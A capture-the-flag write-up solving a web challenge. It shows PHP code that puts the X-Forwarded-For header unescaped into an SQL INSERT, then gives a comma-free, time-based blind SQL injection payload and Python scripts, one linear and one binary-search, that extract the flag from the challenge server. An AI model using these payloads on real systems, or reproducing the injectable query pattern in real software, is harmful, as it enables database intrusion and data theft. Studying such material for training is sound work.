Challenge source:
flag format: flag{xxxxxxxxxxxx}
Might as well write a Python script for it
error_reporting(0);
function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];
}
$host="localhost";
$user="";
$pass="";
$db="";
$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");
mysql_select_db($db) or die("Unable to select database");
$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);
The X-Forwarded-For value only goes into an INSERT and nothing from the database is ever echoed back (the page just prints the raw header), so this has to be a time-based blind injection. getIp() splits the header on ',' and keeps only the first element, so the payload cannot contain a comma: if(cond,a,b) and substr(s,i,1) are out. Use instead:
select case when xxx then xxx else xxx end;
together with the comma-free substr(s from i for 1) form. The leading quote closes the '$ip' string literal and the trailing # comments out the rest of the INSERT.
POC (the X-Forwarded-For value, not a URL):
"127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))#"
({0} and {1} are the loop points, filled in with str.format(): {0} is the character position, {1} the guessed character.)
import requests
import sys
# python3.6

url = 'http://123.206.87.240:8002/web15/'
# Time-based payload: sleep(5) when the guessed character matches, otherwise 0.
sql = "127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))#"
flag = ''
# strtest = "TEST{0}+{1}"

for i in range(1, 40):            # character position in the flag
    for ch in range(32, 129):     # printable ASCII candidates
        if ch == 128:
            sys.exit(0)           # no candidate matched: past the end of the flag
        xff = sql.format(i, chr(ch))
        # print(xff)
        headers = {'X-Forwarded-For': xff}
        print('round ' + str(i) + ', guess ' + str(ch))
        try:
            # timeout=3 < sleep(5): a timeout means the guess was right
            resp = requests.get(url, headers=headers, timeout=3)
        except requests.exceptions.Timeout:
            flag += chr(ch)
            print('flag:' + flag)
            break

# Note: the letters in the recovered flag come out uppercase; the real flag is lowercase.
# Note: because of a bad network connection the latency was too high; running it from a VM gave completely wrong results, switching to the host machine worked.
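A tighter version of the extraction, added here as an illustration and not the writeup's own script. Two changes: it compares ord(substr(... from i for 1)) > n instead of testing each of 96 candidates with ='c' (under MySQL's default case-insensitive collation 'A'='a' is true, which is why the letters came out uppercase above; ord() gives the exact byte), and it binary-searches the byte value, about seven requests per character instead of up to 96. The payload stays comma-free. live_oracle() targets the same URL and header as above; make_fake_oracle() is a constructed local stand-in that parses the position and threshold back out of the payload so the search logic can be checked offline, and the flag it holds is made up.

```python
import re

URL = 'http://123.206.87.240:8002/web15/'   # challenge URL from the writeup
DELAY = 5      # seconds the server sleeps on a true condition
TIMEOUT = 3    # client timeout; must be below DELAY


def payload(pos, n):
    """Comma-free X-Forwarded-For value: true (sleep) iff ord(flag[pos]) > n.

    substr(... FROM pos FOR 1) and ord() avoid the comma that getIp() splits on,
    and ord() compares the raw byte, so case is recovered exactly.
    """
    return ("127.0.0.1'+(select case when ord(substr((select flag from flag) from %d for 1))>%d "
            "then sleep(%d) else 0 end))#" % (pos, n, DELAY))


def live_oracle(xff):
    """Send one probe; a timeout means the condition was true (server slept)."""
    import requests   # only needed when actually talking to the target
    try:
        requests.get(URL, headers={'X-Forwarded-For': xff}, timeout=TIMEOUT)
        return False
    except requests.exceptions.Timeout:
        return True


def make_fake_oracle(flag):
    """Constructed offline stand-in for the server: evaluates the same predicate locally."""
    def oracle(xff):
        m = re.search(r'from (\d+) for 1\)\)>(\d+)', xff)
        pos, n = int(m.group(1)), int(m.group(2))
        if pos > len(flag):
            return False   # MySQL: substr past the end is '', ord('') = 0, never > n
        return ord(flag[pos - 1]) > n
    return oracle


def extract(oracle, max_len=40):
    """Recover the flag one byte at a time, binary-searching ord() in [0, 127]."""
    flag = ''
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127          # invariant: lo <= ord(flag[pos]) <= hi
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(payload(pos, mid)):
                lo = mid + 1     # byte is > mid
            else:
                hi = mid         # byte is <= mid
        if lo == 0:
            break                # ord('') == 0: ran past the end of the flag
        flag += chr(lo)
    return flag


if __name__ == '__main__':
    # Offline check against the constructed oracle; swap in live_oracle for the target.
    demo = make_fake_oracle('flag{Blind_xFf_01}')
    print(extract(demo))
```

Against the real target, replace demo with live_oracle; each character costs seven timed requests, and since a single lost packet looks like a "true" answer, a noisy link should be handled by repeating any probe that times out before accepting it.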
Reference: https://blog.csdn.net/xuchen16/article/details/82904488